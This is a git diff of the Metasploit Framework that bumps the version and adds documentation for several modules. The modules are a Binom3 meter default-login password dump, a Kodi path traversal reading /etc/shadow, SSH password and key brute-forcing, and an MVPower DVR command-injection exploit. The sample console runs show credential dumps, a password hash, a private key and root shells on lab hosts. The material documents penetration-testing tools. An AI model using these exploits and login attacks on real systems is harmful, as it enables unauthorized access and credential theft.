diff --git a/Gemfile.lock b/Gemfile.lock
index ff977d4011..e33b8ec812 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.13.26)
+    metasploit-framework (4.14.1)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -21,6 +21,7 @@ PATH
       nessus_rest
       net-ssh
       network_interface
+      nexpose
       nokogiri
       octokit
       openssl-ccm
@@ -113,7 +114,7 @@ GEM
     childprocess (0.5.9)
       ffi (~> 1.0, >= 1.0.11)
     coderay (1.1.1)
-    contracts (0.14.0)
+    contracts (0.15.0)
     cucumber (2.4.0)
       builder (>= 2.1.2)
       cucumber-core (~> 1.5.0)
@@ -157,7 +158,7 @@ GEM
     grpc (1.1.2)
       google-protobuf (~> 3.1)
       googleauth (~> 0.5.1)
-    i18n (0.8.0)
+    i18n (0.8.1)
     jsobfu (0.4.2)
       rkelly-remix
     json (2.0.3)
@@ -214,6 +215,7 @@ GEM
     nessus_rest (0.1.6)
     net-ssh (4.1.0)
     network_interface (0.0.1)
+    nexpose (5.3.0)
     nokogiri (1.7.0.1)
       mini_portile2 (~> 2.1.0)
     octokit (4.6.2)
@@ -270,7 +272,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.10)
+    rex-exploitation (0.1.11)
       jsobfu
       metasm
       rex-arch
@@ -342,7 +344,7 @@ GEM
     sqlite3 (1.3.13)
     sshkey (1.9.0)
     thor (0.19.4)
-    thread_safe (0.3.5)
+    thread_safe (0.3.6)
     timecop (0.8.1)
     tzinfo (1.2.2)
       thread_safe (~> 0.1)
@@ -374,4 +376,4 @@ DEPENDENCIES
   yard
 
 BUNDLED WITH
-   1.14.4
+   1.14.5
diff --git a/documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md b/documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md
new file mode 100644
index 0000000000..cdfc0f1acb
--- /dev/null
+++ b/documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md
@@ -0,0 +1,33 @@
+This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. The module attempts to download configuration and password files depending on the login user credentials found.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/binom3_login_config_pass_dump```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```run```
+
+## Sample Output
+
+  ```
+msf > use auxiliary/scanner/http/binom3_login_config_pass_dump
+msf auxiliary(binom3_login_config_pass_dump) > set rhosts 1.3.3.7
+msf auxiliary(binom3_login_config_pass_dump) > run
+
+[+] 1.3.3.7:80 - Binom3 confirmed...
+[*] 1.3.3.7:80 - Trying username:"root" with password:"root"
+[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "root":"root"
+[+] ++++++++++++++++++++++++++++++++++++++
+[+] 1.3.3.7 - dumping configuration
+[+] ++++++++++++++++++++++++++++++++++++++
+[+] 1.3.3.7:80 - File retrieved successfully!
+[*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000003_moduletest_1.3.3.7_Binom3_config_165927.txt
+[+] ++++++++++++++++++++++++++++++++++++++
+[+] 1.3.3.7 - dumping password file
+[+] ++++++++++++++++++++++++++++++++++++++
+[+] 1.3.3.7:80 - File retrieved successfully!
+[*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000004_moduletest_1.3.3.7_Binom3_passw_010954.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+  ```
diff --git a/documentation/modules/auxiliary/scanner/http/kodi_traversal.md b/documentation/modules/auxiliary/scanner/http/kodi_traversal.md
new file mode 100644
index 0000000000..8280ebefeb
--- /dev/null
+++ b/documentation/modules/auxiliary/scanner/http/kodi_traversal.md
@@ -0,0 +1,41 @@
+## Vulnerable Application
+
+This module exploits an arbitrary file disclosure vulnerability in Kodi before 17.1.
+
+**Vulnerable Application Installation Steps**
+
+Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if
+you're lazy, like the [one for the Rpi2](http://releases.libreelec.tv/LibreELEC-RPi2.arm-7.0.3.img.gz),
+or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux).
+
+You'll need a version lower than 17.1 of Kodi.
+
+## Verification Steps
+
+A successful run of the exploit will look like this:
+
+```
+msf > use auxiliary/scanner/http/kodi_traversal
+msf auxiliary(kodi_traversal) > set RPORT 8080
+RPORT => 8080
+msf auxiliary(kodi_traversal) > set RHOSTS 192.168.0.31
+RHOSTS => 192.168.0.31
+msf auxiliary(kodi_traversal) > set FILE /etc/shadow
+FILE => /etc/shadow
+msf auxiliary(kodi_traversal) > run
+
+[*] Reading '/etc/shadow'
+[+] /etc/shadow stored as '/home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin'
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(kodi_traversal) > cat /home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin
+[*] exec: cat /home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin
+
+systemd-network:*:::::::
+root:$6$ktSJvEl/p.r7nsR6$.EZhW6/TPiY.7qz.ymYSreJtHcufASE4ykx7osCfBlDXiEKqXoxltsX5fE0mY.494pJOKyuM50QfpLpNKvAPC.:::::::
+nobody:*:::::::
+dbus:*:::::::
+system:*:::::::
+sshd:*:::::::
+avahi:*:::::::
+```
diff --git a/documentation/modules/auxiliary/scanner/ssh/ssh_login.md b/documentation/modules/auxiliary/scanner/ssh/ssh_login.md
new file mode 100644
index 0000000000..1a1be86f02
--- /dev/null
+++ b/documentation/modules/auxiliary/scanner/ssh/ssh_login.md
@@ -0,0 +1,199 @@
+## SSH Service
+
+  SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line level.  SSH is available on most every system, including Windows, but is mainly used by *nix administrators.
+  This module attempts to login to SSH with username and password combinations.  For public/private SSH keys, please use `auxiliary/scanner/ssh/ssh_login_pubkey`.
+  It should be noted that some modern Operating Systems have default configurations to not allow the `root` user to remotely login via SSH, or to only allow `root` to login with an SSH key login.
+
+## Verification Steps
+
+  1. Install SSH and start it.
+  2. Start msfconsole
+  3. Do: ` use auxiliary/scanner/ssh/ssh_login`
+  4. Do: `set rhosts`
+  5. Do: set usernames and passwords via any of the available options
+  5. Do: `run`
+  6. You will hopefully see something similar to, followed by a session:
+
+  ````[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '```
+
+## Options
+
+  **BLANK_PASSWORD**
+
+  Boolean value on if an additional login attempt should be attempted with an empty password for every user.
+  
+  **PASSWORD**
+  
+  Password to try for each user.
+  
+  **PASS_FILE**
+  
+  A file containing a password on every line.  Kali linux example: `/usr/share/wordlists/metasploit/password.lst`
+
+  **RHOSTS**
+  
+  Either a comma space (`, `) separated list of hosts, or a file containing list of hosts, one per line.  File Example: `file://root/ssh_hosts.lst`, list example: `192.168.0.1` or `192.168.0.1, 192.168.0.2`
+
+  **STOP_ON_SUCCESS**
+  
+  If a valid login is found on a host, immediately stop attempting additional logins on that host.
+
+  **USERNAME**
+  
+  Username to try for each password.
+  
+  **USERPASS_FILE**
+  
+  A file containing a username and password, separated by a space, on every line.  An example line would be `username password`
+  
+  **USER_AS_PASS**
+  
+  Boolean value on if an additional login attempt should be attempted with the password as the username.
+  
+  **USER_FILE**
+  
+  A file containing a username on every line.
+
+  **VERBOSE**
+  
+  Show a failed login attempt.  This can get rather verbose when large `USER_FILE`s or `PASS_FILE`s are used.  A failed attempt will look similar to the following:
+
+  ```
+  [-] SSH - Failed: 'msfadmin:virtual'
+  ```
+
+## Option Combinations
+
+It is important to note that usernames and passwords can be entered in multiple combinations.  For instance, a password could be set in `PASSWORD`, be part of either `PASS_FILE` or `USERPASS_FILE`, be guessed via `USER_AS_PASS` or `BLANK_PASSWORDS`.
+This module makes a combination of all of the above when attempting logins.  So if a password is set in `PASSWORD`, and a `PASS_FILE` is listed, passwords will be generated from BOTH of these.
+
+## Scenarios
+
+  Example run against:
+  * Ubuntu 14.04 Server with root login permitted: 192.168.2.156
+  * Ubuntu 16.04 Server: 192.168.2.137
+  * Metasploitable: 192.168.2.46
+  * Metasploitable 2: 192.168.2.35
+
+```
+msf > use auxiliary/scanner/ssh/ssh_login
+msf auxiliary(ssh_login) > cat /root/ssh_passwords.lst
+[*] exec: cat /root/ssh_passwords.lst
+
+msfadmin
+badpassword
+root
+ubuntu
+
+msf auxiliary(ssh_login) > set pass_file /root/ssh_passwords.lst
+pass_file => /root/ssh_passwords.lst
+msf auxiliary(ssh_login) > cat /root/ssh_un.lst
+[*] exec: cat /root/ssh_un.lst
+
+msfadmin
+badpassword
+root
+ubuntu
+
+msf auxiliary(ssh_login) > set user_file /root/ssh_un.lst
+user_file => /root/ssh_un.lst
+msf auxiliary(ssh_login) > cat /root/ssh_hosts.lst
+[*] exec: cat /root/ssh_hosts.lst
+
+192.168.2.156
+192.168.2.137
+192.168.2.35
+192.168.2.46
+msf auxiliary(ssh_login) > set rhosts file://root/ssh_hosts.lst
+rhosts => file://root/ssh_hosts.lst
+msf auxiliary(ssh_login) > set verbose false
+verbose => false
+msf auxiliary(ssh_login) > set threads 4
+threads => 4
+msf auxiliary(ssh_login) > exploit
+
+[*] SSH - Starting bruteforce
+[*] SSH - Starting bruteforce
+[*] SSH - Starting bruteforce
+[*] SSH - Starting bruteforce
+[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
+[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
+[*] Command shell session 5 opened (192.168.2.117:44415 -> 192.168.2.46:22) at 2017-02-22 20:26:13 -0500
+[*] Command shell session 6 opened (192.168.2.117:36107 -> 192.168.2.35:22) at 2017-02-22 20:26:13 -0500
+[+] SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
+[*] Command shell session 7 opened (192.168.2.117:32829 -> 192.168.2.156:22) at 2017-02-22 20:26:35 -0500
+[+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
+[*] Command shell session 8 opened (192.168.2.117:42205 -> 192.168.2.156:22) at 2017-02-22 20:26:42 -0500
+[+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
+[*] Command shell session 9 opened (192.168.2.117:37027 -> 192.168.2.137:22) at 2017-02-22 20:26:44 -0500
+[*] Scanned 3 of 4 hosts (75% complete)
+[*] Scanned 4 of 4 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(ssh_login) > sessions -l
+
+Active sessions
+===============
+
+  Id  Type          Information                              Connection
+  --  ----          -----------                              ----------
+  5   shell /linux  SSH msfadmin:msfadmin (192.168.2.46:22)  192.168.2.117:44415 -> 192.168.2.46:22 (192.168.2.46)
+  6   shell /linux  SSH msfadmin:msfadmin (192.168.2.35:22)  192.168.2.117:36107 -> 192.168.2.35:22 (192.168.2.35)
+  7   shell /linux  SSH root:ubuntu (192.168.2.156:22)       192.168.2.117:32829 -> 192.168.2.156:22 (192.168.2.156)
+  8   shell /linux  SSH ubuntu:ubuntu (192.168.2.156:22)     192.168.2.117:42205 -> 192.168.2.156:22 (192.168.2.156)
+  9   shell /linux  SSH ubuntu:ubuntu (192.168.2.137:22)     192.168.2.117:37027 -> 192.168.2.137:22 (192.168.2.137)
+```
+
+  Example run against:
+  * Windows 10 w/ Linux Subsystem
+
+```
+msf > use auxiliary/scanner/ssh/ssh_login
+msf auxiliary(ssh_login) > set rhosts 192.168.2.140
+rhosts => 192.168.2.140
+msf auxiliary(ssh_login) > set username winuser
+username => winuser
+msf auxiliary(ssh_login) > set password "badpassword"
+password => badpassword
+msf auxiliary(ssh_login) > exploit
+
+[*] SSH - Starting bruteforce
+[+] SSH - Success: 'winuser:badpassword' ''
+[!] No active DB -- Credential data will not be saved!
+[*] Command shell session 1 opened (192.168.2.117:42227 -> 192.168.2.140:22) at 2017-02-22 20:40:12 -0500
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(ssh_login) > sessions -l
+
+Active sessions
+===============
+
+  Id  Type     Information                               Connection
+  --  ----     -----------                               ----------
+  1   shell /  SSH winuser:badpassword (192.168.2.140:22)  192.168.2.117:42227 -> 192.168.2.140:22 (192.168.2.140)
+
+```
+
+  Example run against:
+  * Windows 10 w/ Bitvise SSH Server (WinSSHD) version 7.26-r2 and a virtual account created
+  
+  It is important to note here that the module gives back a **Success**, but then errors when trying to identify the remote system.
+  This should be enough info to manually exploit via a regular SSH command.
+
+```
+msf > use auxiliary/scanner/ssh/ssh_login
+msf auxiliary(ssh_login) > set rhosts 192.168.2.140
+rhosts => 192.168.2.140
+msf auxiliary(ssh_login) > set username virtual
+username => virtual
+msf auxiliary(ssh_login) > set password virtual
+password => virtual
+msf auxiliary(ssh_login) > exploit
+
+[*] SSH - Starting bruteforce
+[+] SSH - Success: 'virtual:virtual' 'id: Command not found.  help ?: Command not found.  '
+[!] No active DB -- Credential data will not be saved!
+[*] 192.168.2.140 - Command shell session 4 closed.  Reason: Died from EOFError
+[*] Command shell session 4 opened (192.168.2.117:36169 -> 192.168.2.140:22) at 2017-02-22 21:20:24 -0500
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
diff --git a/documentation/modules/auxiliary/scanner/ssh/ssh_login_pubkey.md b/documentation/modules/auxiliary/scanner/ssh/ssh_login_pubkey.md
new file mode 100644
index 0000000000..7804533e78
--- /dev/null
+++ b/documentation/modules/auxiliary/scanner/ssh/ssh_login_pubkey.md
@@ -0,0 +1,141 @@
+## SSH Service
+
+  SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line level.  SSH is available on most every system, including Windows, but is mainly used by *nix administrators.
+  This module attempts to login to SSH with username and private key combinations.  For username and password logins, please use `auxiliary/scanner/ssh/ssh_login`.
+  It should be noted that some modern Operating Systems have default configurations to not allow the `root` user to remotely login via SSH, or to only allow `root` to login with an SSH key login.
+
+### Key Generation
+
+  On most modern *nix Operating System, the `ssh-keygen` command can be utilized to create an SSH key.  Metasploit expects the key to be unencrypted, so no password should be set during `ssh-keygen`.
+  After following the prompts to create the SSH key pair, the `pub` key needs to be added to the authorized_keys list.  To do so simply run: `cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys`
+
+## Verification Steps
+
+  1. Install SSH and start it.
+  2. Create an SSH keypair and add the public key to the `authorized_keys` file
+  3. Start msfconsole
+  4. Do: ` use auxiliary/scanner/ssh/ssh_login_pubkey`
+  5. Do: `set rhosts`
+  6. Do: set usernames with one of the available options
+  7. Do: `set KEY_PATH ` to either a file or path
+  7. Do: `run`
+  8. You will hopefully see something similar to the following:
+
+  ```
+  [+] SSH - Success: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----
+  ```
+
+## Options
+
+  **KEY_PATH**
+
+  A string to the private key to attempt, or a folder containing private keys to attempt.  Any file name starting with a period (`.`) or ending in `.pub` will be ignored.
+  An SSH key is typically kept in a user's home directory under `.ssh/id_rsa`.  The file contents, when not encrypted with a password will start with `-----BEGIN RSA PRIVATE KEY-----`
+  
+  **RHOSTS**
+  
+  Either a comma space (`, `) separated list of hosts, or a file containing list of hosts, one per line.  File Example: `file://root/ssh_hosts.lst`, list example: `192.168.0.1` or `192.168.0.1, 192.168.0.2`
+
+  **STOP_ON_SUCCESS**
+  
+  If a valid login is found on a host, immediately stop attempting additional logins on that host.
+
+  **USERNAME**
+  
+  Username to try for each password.
+  
+  **USER_FILE**
+  
+  A file containing a username on every line.
+
+  **VERBOSE**
+  
+  Show a failed login attempt.  This can get rather verbose when large `USER_FILE`s or `KEY_PATH`s are used.  A failed attempt will look similar to the following: `[-] SSH - Failed`
+
+## Option Combinations
+
+It is important to note that usernames can be entered in multiple combinations.  For instance, a username could be set in `USERNAME`, and be part of `USER_FILE`.
+This module makes a combination of all of the above when attempting logins.  So if a username is set in `USERNAME`, and a `USER_FILE` is listed, usernames will be generated from BOTH of these.
+
+## Scenarios
+
+  Example run with a FOLDER set for `KEY_PATH` against:
+  * Ubuntu 14.04 Server
+
+  While the two SSH key are nearly identical, one character has been modified in one of the keys to prevent a successful login.
+
+```
+msf > use auxiliary/scanner/ssh/ssh_login_pubkey 
+msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.156
+rhosts => 192.168.2.156
+msf auxiliary(ssh_login_pubkey) > set username ubuntu
+username => ubuntu
+msf auxiliary(ssh_login_pubkey) > set key_path /root/sshkeys/
+key_path => /root/sshkeys/
+msf auxiliary(ssh_login_pubkey) > run
+
+[*] 192.168.2.156:22 SSH - Testing Cleartext Keys
+[*] SSH - Testing 2 keys from /root/sshkeys
+[-] SSH - Failed: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----
+MIIEpQIBAAKCAQEAtwJrqowPyjWONHUCMqU/Fh3yRn42+X9hahtTv/6plYpb4WrA
+NxDaYIrBGAO//u2SkGcIhnAdzYVmovWahKEwcxZ2XJo/nj4gjh1CbI1xVCFeE/oX
+oWpIN+4q8JQ0Iq1dm+c+WPQIEzlVpMRaKeuMxdGPNMTYWxolSEIMPPYmyWXG6gz8
+fYYZDo8+w8G78w7oUV6hSIwCDzw09A5yGyt51ZETeSZiZ24bHlBQSyk7yFq/eo58
+xhlc79jpZrSdX8kx8HrCZKND7O6E4YSktfSHOvd81QUCSyoi5Y+9RXsLjUEba0+Y
+aAz8mZPLdxbRu75eeD/mZTv5gALewXeb65IkPQIDAQABAoIBACvi5LbNR6wSE7v4
+o0JJ5ksDe2n0MnK6XT34t6i/BSPbPhVcaCPMYtHr9Eox/ATCK/d8/cpfcIYsi2Rg
+yWEs1lWC+XdTdhYYh+4MjjVB5f9q0QixXKFUv2TKNHnk0GvQbzZHyefC/Xy+rw8I
+FyceWW/GxTS+T7PpHS+qxwyHat24ph7Xz/cE/0UyrVu+NAzFXaHq60M2/RRh3uXE
+1vqiZVlapczO/DxsnPwQrE2EOm0lzrQVmZbX5BYK1yiCd5eTgLhOb+ms2p/8pb2I
+jrK5FzLnUZu0H0ZHtihOVkx4l8NZqB36jinaRs0wWN7It4/C5+NkyoMvuceIn1Wx
+tstYD3ECgYEA7sOb0CdGxXw0IVrJF+3C8m1UG3CfQfzms+rJb9w3OJVl2BTlYdPr
+JgXI/YoV9FQPvXmTWrRP9e6x0kuSVHO1ejMpyLHGmMcJDZhpVKMROOosIWfROxwk
+bkPU2jdUXIrHgu8NnmnyytjUnJgeerQZLhCtjKmBKCZisS4WPBdun3MCgYEAxDh1
+fjFJttWhgeg6pcvvmDUWO1W0lJ9ZjjQll1UmbPmKDGwwsjPZEkZfLkvI77st81AT
+eW/p7tMKE3fCkXkn2KWMQ6ZGN5yflwvjJOMAVZz8ir8Cu1npa6f6HIrxpHSKethY
+dG4ssCpQctfoRfN4wg6fOHBOpGd3BH1GdOwR4Y8CgYEAq3h7e//ZCZbrcVDbvn2Y
+VbZCgvpcxW002d0yEU2bst1IKOjI23rwE3xwHfV/UtrT+wVG2AtKqZpkxlxTmKcI
+m9wGlAVoVOwMCmF8s7XwdmlmjA8c6lCJsU6xnI3D3jokklnP9AauwRL7jgKJUSHq
+O3TqzmwlP4phslEg0sMZRRUCgYEAwkS3prG7rqYBmjFG52FqnIJquWIYQFEoBE+C
+rDqkqZ3B3Jy89aG5l4tOrvJfRWJHky7DqSZxMH+G6VFXtFmEZs04er3DpUmPA6fE
+Qn/wk9KygdetJ7pUDL8pNFsn9M9hT1Ck+tkdq2ipb5ptn9v2wgJiBynB4qmBP1Oc
+jyQua+cCgYEAl77hJQK97tdJ5TuOXSsdpW8IMvbiaWTgvZtKVJev31lWgJ+knpCf
+AaZna5YokhaNvfGGbO5N8YoYShIpGdvWI+dIT8xYvPkJmYdnTz7/dmBUcwLtNVx/
+7PI/l5XrFMRsnu/CYuBPuWB+RCTLjIr1D1RluNbIb7xr+kDHuzgInvA=
+-----END RSA PRIVATE KEY-----
+
+'
+[!] No active DB -- Credential data will not be saved!
+[+] SSH - Success: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----
+MIIEpQIBAAKCAQEAtwJrqowPyjWONHUCMqU/Fh3yRn42+X9hahtTv/6plYpb4WrA
+NxDaYIrBGAO//u2SkGcIhnAdzYVmovWahKEwcxZ2XJo/nj4gjh1CbI1xVCFeE/oX
+oWpIN+4q8JQ0Iq1dm+c+WPQIEzlVpMRaKeuMxdGPNMTYWxolSEIMPPYmyWXG6gz8
+fYYZDo8+w8G78w7oUV6hSIwCDzw09A5yGyt51ZETeSZiZ24bHlBQSyk7yFq/eo58
+xhlc79jpZrSdX8kx8HrCZKND7O6E4YSktfSHOvd81QUCSyoi5Y+9RXsLjUEba0+Y
+0Az8mZPLdxbRu75eeD/mZTv5gALewXeb65IkPQIDAQABAoIBACvi5LbNR6wSE7v4
+o0JJ5ksDe2n0MnK6XT34t6i/BSPbPhVcaCPMYtHr9Eox/ATCK/d8/cpfcIYsi2Rg
+yWEs1lWC+XdTdhYYh+4MjjVB5f9q0QixXKFUv2TKNHnk0GvQbzZHyefC/Xy+rw8I
+FyceWW/GxTS+T7PpHS+qxwyHat24ph7Xz/cE/0UyrVu+NAzFXaHq60M2/RRh3uXE
+1vqiZVlapczO/DxsnPwQrE2EOm0lzrQVmZbX5BYK1yiCd5eTgLhOb+ms2p/8pb2I
+jrK5FzLnUZu0H0ZHtihOVkx4l8NZqB36jinaRs0wWN7It4/C5+NkyoMvuceIn1Wx
+tstYD3ECgYEA7sOb0CdGxXw0IVrJF+3C8m1UG3CfQfzms+rJb9w3OJVl2BTlYdPr
+JgXI/YoV9FQPvXmTWrRP9e6x0kuSVHO1ejMpyLHGmMcJDZhpVKMROOosIWfROxwk
+bkPU2jdUXIrHgu8NnmnyytjUnJgeerQZLhCtjKmBKCZisS4WPBdun3MCgYEAxDh1
+fjFJttWhgeg6pcvvmDUWO1W0lJ9ZjjQll1UmbPmKDGwwsjPZEkZfLkvI77st81AT
+eW/p7tMKE3fCkXkn2KWMQ6ZGN5yflwvjJOMAVZz8ir8Cu1npa6f6HIrxpHSKethY
+dG4ssCpQctfoRfN4wg6fOHBOpGd3BH1GdOwR4Y8CgYEAq3h7e//ZCZbrcVDbvn2Y
+VbZCgvpcxW002d0yEU2bst1IKOjI23rwE3xwHfV/UtrT+wVG2AtKqZpkxlxTmKcI
+m9wGlAVoVOwMCmF8s7XwdmlmjA8c6lCJsU6xnI3D3jokklnP9AauwRL7jgKJUSHq
+O3TqzmwlP4phslEg0sMZRRUCgYEAwkS3prG7rqYBmjFG52FqnIJquWIYQFEoBE+C
+rDqkqZ3B3Jy89aG5l4tOrvJfRWJHky7DqSZxMH+G6VFXtFmEZs04er3DpUmPA6fE
+Qn/wk9KygdetJ7pUDL8pNFsn9M9hT1Ck+tkdq2ipb5ptn9v2wgJiBynB4qmBP1Oc
+jyQua+cCgYEAl77hJQK97tdJ5TuOXSsdpW8IMvbiaWTgvZtKVJev31lWgJ+knpCf
+AaZna5YokhaNvfGGbO5N8YoYShIpGdvWI+dIT8xYvPkJmYdnTz7/dmBUcwLtNVx/
+7PI/l5XrFMRsnu/CYuBPuWB+RCTLjIr1D1RluNbIb7xr+kDHuzgInvA=
+-----END RSA PRIVATE KEY-----
+
+' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
+[*] Command shell session 1 opened (192.168.2.117:44179 -> 192.168.2.156:22) at 2017-02-22 22:08:11 -0500
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
diff --git a/documentation/modules/exploit/linux/http/mvpower_dvr_shell_exec.md b/documentation/modules/exploit/linux/http/mvpower_dvr_shell_exec.md
new file mode 100644
index 0000000000..4f9e8ed681
--- /dev/null
+++ b/documentation/modules/exploit/linux/http/mvpower_dvr_shell_exec.md
@@ -0,0 +1,43 @@
+## Vulnerable Application
+
+  This module exploits an unauthenticated remote command execution vulnerability in MVPower digital video recorders. The 'shell' file on the web interface executes arbitrary operating system commands in the query string.
+
+  This module was tested successfully on a MVPower model TV-7104HE with firmware version 1.8.4 115215B9 (Build 2014/11/17).
+
+  The TV-7108HE model is also reportedly affected, but untested.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/linux/http/mvpower_dvr_shell_exec`
+  3. Do: `set rhost [IP]`
+  4. Do: `set lhost [IP]`
+  5. Do: `run`
+  6. You should get a session
+
+
+## Example Run
+
+
+  ```
+  msf exploit(mvpower_dvr_shell_exec) > run
+
+  [*] Started reverse TCP handler on 10.1.1.197:4444 
+  [*] 10.1.1.191:80 - Connecting to target
+  [+] 10.1.1.191:80 - Target is vulnerable!
+  [*] Using URL: http://0.0.0.0:8080/BBRyjDtj81x3bTq
+  [*] Local IP: http://10.1.1.197:8080/BBRyjDtj81x3bTq
+  [*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.191:56881) at 2017-02-21 23:59:33 -0500
+  [*] Command Stager progress - 100.00% done (117/117 bytes)
+  [*] Server stopped.
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 10.1.1.191
+  OS           :  (Linux 3.0.8)
+  Architecture : armv7l
+  Meterpreter  : armle/linux
+  meterpreter > 
+  ```
diff --git a/documentation/modules/exploit/multi/fileformat/swagger_param_inject.md b/documentation/modules/exploit/multi/fileformat/swagger_param_inject.md
old mode 100755
new mode 100644
diff --git a/documentation/modules/post/windows/manage/mssql_local_auth_bypass.md b/documentation/modules/post/windows/manage/mssql_local_auth_bypass.md
old mode 100755
new mode 100644
diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb
index 84ac6aa7f1..f697dbf279 100644
--- a/lib/metasploit/framework/version.rb
+++ b/lib/metasploit/framework/version.rb
@@ -30,7 +30,7 @@ module Metasploit
         end
       end
 
-      VERSION = "4.13.26"
+      VERSION = "4.14.1"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash
diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index a99147dd1c..a062435bcc 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -430,7 +430,6 @@ module Msf
       window.onload = function() {
         var osInfo = os_detect.getVersion();
         var d = {
-          "os_name"     : osInfo.os_name,
           "os_vendor"   : osInfo.os_vendor,
           "os_device"   : osInfo.os_device,
           "ua_name"     : osInfo.ua_name,
@@ -439,7 +438,8 @@ module Msf
           "java"        : misc_addons_detect.getJavaVersion(),
           "silverlight" : misc_addons_detect.hasSilverlight(),
           "flash"       : misc_addons_detect.getFlashVersion(),
-          "vuln_test"   : <%= js_vuln_test %>
+          "vuln_test"   : <%= js_vuln_test %>,
+          "os_name"     : osInfo.os_name
         };
 
         <% if os.match(OperatingSystems::Match::WINDOWS) and client == HttpClients::IE %>
@@ -501,7 +501,7 @@ module Msf
 
       %Q|
       <script>
-      #{code}
+      #{js}
       </script>
       <noscript>
       <img style="visibility:hidden" src="#{get_resource.chomp("/")}/#{@noscript_receiver_page}/">
diff --git a/lib/rapid7/nexpose.rb b/lib/rapid7/nexpose.rb
deleted file mode 100644
index e8b0c6e34d..0000000000
